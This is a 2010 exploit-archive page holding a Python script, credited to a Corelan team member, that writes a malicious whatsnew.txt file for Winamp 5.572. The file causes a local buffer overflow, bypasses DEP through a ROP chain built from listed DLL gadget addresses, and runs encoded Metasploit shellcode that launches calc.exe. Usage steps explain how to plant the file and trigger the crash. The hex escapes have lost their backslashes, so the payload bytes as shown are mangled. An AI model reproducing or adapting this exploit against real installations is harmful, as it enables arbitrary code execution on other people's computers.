Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================== Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass) ====================================================== #!/usr/bin/python # # Title: Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass) # Author: Rocco Calvi aka TecR0c - http://tecninja.net/blog | http://twitter.com/TecR0c # Found BY: Debug # Date: June 18th, 2010 # Platform: Windows XP sp3 En # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # Special thanks to mr_me for making me try harder and lincoln # Usage stage 1 : Replace existing whatsnew.txt file with evil whatsnew.txt # Usage stage 2 : Launch Application > Help > About Winamp > Version History > BOOM! print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] Winamp 5.572 (whatnews.txt) DEP Bypass - by TecR0c" # http://www.metasploit.com # EXITFUNC=process, CMD=calc.exe sc = ("x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49" "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" "x58x34x41x50x30x41x33x48x48x30x41x30x30x41" "x42x41x41x42x54x41x41x51x32x41x42x32x42x42" "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a" "x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47" "x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c" "x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a" "x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46" "x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45" "x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c" "x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c" "x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44" "x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c" "x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46" "x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50" "x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44" "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45" "x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43" "x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b" "x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43" "x51x42x4cx42x43x43x30x41x41"); version = "Winamp 5.572" rop = "x41" * 540 # Crash rop += "x09x12x0ex07" # 0x070E1209 : {POP} # POP EDI # POP ESI # POP EBP # XOR EAX,EAX # POP EBX # RETN [Module : nde.dll] rop += "xeexffxffxc0" # 0xc0ffffee : Junk rop += "xeexffxffxc0" # 0xc0ffffee : Junk rop += "xeexffxffxc0" # 0xc0ffffee : Junk rop += "xeexffxffxc0" # 0xc0ffffee : Junk rop += "x03x85x09x07" # 0x07098503 : EAX CALL rop += "xeexffxffxc0" # 0xc0ffffee : Junk rop += "xeexffxffxc0" # 0xc0ffffee : Junk rop += "xffxffxffxff" # 0xffffffff : for EBX rop += "xc5x01x5ax78" # 0x785A01C5 : # POP EDX # RETN [Module : MSVCR90.dll] rop += "x10xe0x10x07" # 0x07100e01 : Writeable Address rop += "x46x17x5ax78" # 0x785A1746 : # ADD EAX,40 # POP EBP # RETN [Module : MSVCR90.dll] rop += "xeexffxffxc0" # 0xc0ffffee : Junk rop += "x6ex22x97x7c" # 0x7C97226E : # ADD EAX,100 # POP EBP # RETN rop += "xcfx22x80x7c" # 0x7C8022CF : dest address in WriteProcessMemory() rop += "xcfxc9x0ex07" # 0x070EC9CF : # ADD EBX,EAX # XOR AL,AL # RETN [Module : nde.dll] rop += "x5ex89x09x07" # 0x0709895E : {POP} # POP EAX # POP ESI # RETN [Module : libsndfile.dll] rop += "x13x22x80x7c" # 0x7C802213 : WriteProcessMemory rop += "xffxffxffxff" # 0xffffffff : HProcess HANDLE (-1) rop += "x65x08x59x78" # 0x78590865 : # PUSHAD # RETN [Module : MSVCR90.dll] junk = "x43" * 800 tecfile = open('whatsnew.txt','w') tecfile.write(version + rop + sc + junk) tecfile.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
